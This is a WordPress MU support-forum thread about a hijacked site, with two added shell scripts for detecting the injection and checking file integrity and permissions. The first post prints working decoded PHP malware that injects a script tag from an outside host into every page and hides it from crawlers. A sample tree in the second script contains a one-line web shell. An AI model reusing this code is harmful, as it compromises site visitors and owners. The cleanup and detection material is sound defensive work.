
Help! WPMU 2.9.2 Hijacked (5 posts)

  1. PopTopJosh
    Member
    Posted 13 years ago

    Looking for some help figuring out first how to clean up a hijacked MU site and second what to do to prevent this from happening again. Basically any visits to the front end or back end of the site redirect to a virus site. After a bit of research, peeping at some of the PHP files in the install showed a bunch of base64 code at the top of all files. Run through a decoder, I get this:

    if (function_exists('ob_start') && !isset($GLOBALS['mr_no'])) {
        $GLOBALS['mr_no'] = 1;   // run-once guard, since the prefix sits in every included file
        if (!function_exists('mrobh')) {
            if (!function_exists('gml')) {
                // Returns the injected tag, but hands crawlers an empty string so the
                // injection stays out of search-engine caches
                function gml() {
                    if (!stristr($_SERVER["HTTP_USER_AGENT"], "googlebot") && (!stristr($_SERVER["HTTP_USER_AGENT"], "yahoo"))) {
                        // decodes to: <script src="http://holasionweb.com/oo.php"></script>
                        return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9ob2xhc2lvbndlYi5jb20vb28ucGhwIj48L3NjcmlwdD4=");
                    }
                    return "";
                }
            }
            if (!function_exists('gzdecode')) {
                // Minimal gzip decoder (walks the RFC 1952 header, then inflates) so the
                // callback can still rewrite output that was already gzip-compressed.
                // Local variable names are shortened from the obfuscated $R... forms.
                function gzdecode($data) {
                    $flags = @ord(@substr($data, 3, 1));
                    $offset = 10;
                    $unused = 0;   // assigned but never read in the original
                    if ($flags & 4) {    // FEXTRA
                        $xlen = @unpack('v', substr($data, 10, 2));
                        $xlen = $xlen[1];
                        $offset += 2 + $xlen;
                    }
                    if ($flags & 8) {    // FNAME: skip the NUL-terminated file name
                        $offset = @strpos($data, chr(0), $offset) + 1;
                    }
                    if ($flags & 16) {   // FCOMMENT: skip the NUL-terminated comment
                        $offset = @strpos($data, chr(0), $offset) + 1;
                    }
                    if ($flags & 2) {    // FHCRC
                        $offset += 2;
                    }
                    $out = @gzinflate(@substr($data, $offset));
                    if ($out === FALSE) {
                        $out = $data;    // not gzip after all: pass the buffer through
                    }
                    return $out;
                }
            }
            // Output-buffer callback: decompress the page and splice the tag in before </body>
            function mrobh($buffer) {
                Header('Content-Encoding: none');
                $html = gzdecode($buffer);
                if (preg_match('/\<\/body/si', $html)) {
                    return preg_replace('/(\<\/body[^\>]*\>)/si', gml() . "\n" . '$1', $html);
                } else {
                    return $html . gml();
                }
            }
            ob_start('mrobh');
        }
    }

    As a temporary stopgap, I put up an index.html page and renamed index.php to index1.php, so at least visitors aren't being sent to the bad site. With this done, I'm now trying to figure out next steps. Any help greatly appreciated.
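A way to find every file carrying this injection instead of peeping at them one at a time, added here as an example and not code from the thread or from WPMU. It assumes the prefix is the usual eval(base64_decode("...")) wrapper on one line (the post only says "base64 code at the top of all files"), that GNU coreutils base64 is available for -d, and it runs against a constructed sample tree in which the placeholder host example.invalid stands in for the real script host. The nested decode step is what exposes the injected <script> tag that the outer payload hides behind a second base64 literal.

```shell
#!/bin/sh
# Added example; not code from the thread or from WPMU. Scans a tree for PHP
# files that carry an injected eval(base64_decode("...")) line (the wrapper is
# an assumption: the post only says "base64 code at the top of all files"),
# decodes the payload and flags files whose decoded payload carries the markers
# visible in the decoded dropper (ob_start, mrobh, mr_no).
# Requires GNU coreutils base64 (-d) and POSIX sed/find.

# extract_payload FILE -> the first base64 literal passed to
# eval(base64_decode(...)) in FILE, quotes stripped; empty if none
extract_payload() {
    sed -n 's|.*eval(base64_decode(\([^)]*\))).*|\1|p' "$1" | head -n 1 | tr -d '"'"'"
}

# decode_payload FILE -> decoded PHP on stdout; returns 1 if no valid payload
decode_payload() {
    p=$(extract_payload "$1")
    [ -n "$p" ] || return 1
    printf '%s' "$p" | base64 -d 2>/dev/null
}

# scan_php_dir DIR -> path of each PHP file whose payload looks like the dropper
scan_php_dir() {
    find "$1" -type f -name '*.php' | sort | while read -r f; do
        dec=$(decode_payload "$f") || continue
        case $dec in
            *ob_start*|*mrobh*|*mr_no*) printf '%s\n' "$f" ;;
        esac
    done
}

# nested_strings FILE -> every base64_decode("...") literal inside the decoded
# payload, decoded in turn; this is where the injected <script> tag hides
nested_strings() {
    decode_payload "$1" \
        | grep -o 'base64_decode("[A-Za-z0-9+/=]*")' \
        | sed 's|base64_decode("\(.*\)")|\1|' \
        | while read -r s; do
            printf '%s' "$s" | base64 -d 2>/dev/null
            printf '\n'
        done
}

# make_sample_dir DIR -> writes constructed sample files (not real WPMU files):
# two carrying a payload modelled on the dropper from the post, two clean ones
make_sample_dir() {
    mkdir -p "$1/wp-content/themes/default"
    # example.invalid is a placeholder for the real script host
    inner=$(printf '%s' '<script src="http://example.invalid/oo.php"></script>' | base64 | tr -d '\n')
    dropper="if(function_exists('ob_start')&&!isset(\$GLOBALS['mr_no'])){\$GLOBALS['mr_no']=1;function mrobh(\$b){return \$b.base64_decode(\"$inner\");}ob_start('mrobh');}"
    payload=$(printf '%s' "$dropper" | base64 | tr -d '\n')
    printf '<?php eval(base64_decode("%s")); ?>\n<?php /* original index.php */ ?>\n' "$payload" > "$1/index.php"
    printf '<?php eval(base64_decode('"'"'%s'"'"')); ?>\n<?php /* theme index */ ?>\n' "$payload" > "$1/wp-content/themes/default/index.php"
    printf '<?php /* untouched */ ?>\n' > "$1/wp-config-sample.php"
    printf '<?php echo base64_decode("aGVsbG8="); ?>\n' > "$1/benign-base64.php"
}

# Demo on a throwaway tree
tmp=$(mktemp -d)
make_sample_dir "$tmp"
echo "infected files:"; scan_php_dir "$tmp"
echo "injected content hidden in index.php:"; nested_strings "$tmp/index.php"
rm -rf "$tmp"
```

Run it against the web root instead of the sample tree to get the list of files to replace; a file that merely calls base64_decode without eval (as benign-base64.php does) is not reported, so plugins that legitimately decode data do not show up as false positives.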

  2. SteveAtty
    Member
    Posted 13 years ago

    Change all your server passwords, upload a new version of the WPMU core files and your plugins and themes. Make sure file permissions are set so that only the folder used for file uploads and for caching (if you have it) are writable by the webserver user. All other files should be read-only for the webserver user.

  3. andrea_r
    Moderator
    Posted 13 years ago

    Are you perchance hosted at GoDaddy? Because this is the third time that host has been hit by this same hack.

    I will note strongly here that it does not affect just WordPress or MU sites, but ANY PHP-based site.

  4. PopTopJosh
    Member
    Posted 13 years ago

    Yes, it is a GoDaddy site.

    What about the database? We have nightly DB and FTP backups being made, so I'm hoping we can roll the db back, reinstall MU, plugins, theme and be done with this. Any thoughts on whether this stuff is getting into databases or how to ferret it out?

  5. andrea_r
    Moderator
    Posted 13 years ago

    It's not getting into the database itself. It's just getting into the server and editing files, and some of us feel it's via FTP vulnerabilities, though I will say this attack has mostly been on larger shared hosts so far. And for GoDaddy in particular, the THIRD time this month.

    Use SFTP if you can. FTP is actually pretty easy to crack.

    Also, it's my understanding that GoDaddy has a "restore" feature, but you'd have to make sure you rolled back to before the hack. And you may lose posts in between. Check your backups.

    Generally speaking, removing all the old files and replacing with fresh should clean it up.

    More: http://blog.sucuri.net/2010/05/lots-of-sites-reinfected-now-using.html
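The two pieces of advice that recur in this thread, SteveAtty's "upload a new version of the core files, plugins and themes and make everything but uploads and cache read-only" and andrea_r's "remove all the old files and replace with fresh", both come down to checks that can be scripted. The following is an added example, not code from the thread or from WPMU: it hashes a live tree and a freshly downloaded copy of the same WPMU version and prints every file that differs or exists only on the live side (the files to replace or review), then lists the files that still carry a write bit outside the uploads directory. It assumes the uploads directory is wp-content/uploads, that paths contain no spaces (awk splits on whitespace), and that sha256sum from GNU coreutils is available; the sample trees it runs on are constructed.

```shell
#!/bin/sh
# Added example; not code from the thread or from WPMU. Compares a live tree
# against a fresh copy of the same version so every changed or unexpected file
# is replaced, and lists which files are still writable afterwards.
# Assumptions: uploads live in wp-content/uploads, no spaces in paths (awk
# splits on whitespace), CLEAN is non-empty, sha256sum (GNU coreutils) exists.

# hash_tree DIR -> "sha256  ./relative/path" per file, sorted by path
hash_tree() {
    ( cd "$1" && find . -type f | sort | while read -r f; do sha256sum "$f"; done )
}

# files_to_replace CLEAN LIVE [UPLOADS]
# Prints live paths that are absent from CLEAN or differ from it; files under
# UPLOADS are skipped because a fresh core never contains user content.
files_to_replace() {
    _uploads=${3:-wp-content/uploads}
    _c=$(mktemp); _l=$(mktemp)
    hash_tree "$1" > "$_c"
    hash_tree "$2" > "$_l"
    awk -v up="./$_uploads/" '
        NR == FNR { clean[$2] = $1; next }           # first file: clean hashes
        index($2, up) == 1 { next }                  # skip uploads
        !($2 in clean) || clean[$2] != $1 { print $2 }
    ' "$_c" "$_l"
    rm -f "$_c" "$_l"
}

# writable_outside_uploads LIVE [UPLOADS]
# Lists files carrying any write bit outside UPLOADS. On shared hosts PHP
# usually runs as the file owner, so an owner-writable file is writable by a
# compromised script too; after cleanup this list should be empty (chmod 444).
writable_outside_uploads() {
    _uploads=${2:-wp-content/uploads}
    find "$1" -type f \( -perm -200 -o -perm -020 -o -perm -002 \) ! -path "$1/$_uploads/*"
}

# make_sample_trees CLEAN LIVE -> constructed sample trees (not real WPMU files):
# LIVE has a modified index.php, a dropped shell.php, one untouched plugin file
# already set read-only, and a legitimate upload.
make_sample_trees() {
    mkdir -p "$1/wp-content" "$2/wp-content/uploads"
    printf '<?php echo "index"; ?>\n' > "$1/index.php"
    printf '<?php echo "plugin"; ?>\n' > "$1/wp-content/plugin.php"
    cp "$1/wp-content/plugin.php" "$2/wp-content/plugin.php"
    # "aWYoMSl7fQ==" is base64 for the harmless PHP "if(1){}"
    printf '<?php eval(base64_decode("aWYoMSl7fQ==")); ?>\n<?php echo "index"; ?>\n' > "$2/index.php"
    printf '<?php system($_GET["c"]); ?>\n' > "$2/shell.php"
    printf 'not a real image\n' > "$2/wp-content/uploads/photo.jpg"
    chmod 444 "$2/wp-content/plugin.php"
    chmod 644 "$2/index.php" "$2/shell.php" "$2/wp-content/uploads/photo.jpg"
}

# Demo on throwaway trees
clean=$(mktemp -d); live=$(mktemp -d)
make_sample_trees "$clean" "$live"
echo "replace from fresh copy (or review):"; files_to_replace "$clean" "$live"
echo "still writable outside uploads:"; writable_outside_uploads "$live"
rm -rf "$clean" "$live"
```

Unpack the fresh WPMU archive plus the same plugin and theme versions into CLEAN and point LIVE at a copy of the hosting account pulled over SFTP; wp-config.php will always be listed because the fresh copy does not contain it, so review it by hand rather than replacing it.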

About this Topic

  • Started 13 years ago by PopTopJosh
  • Latest reply from andrea_r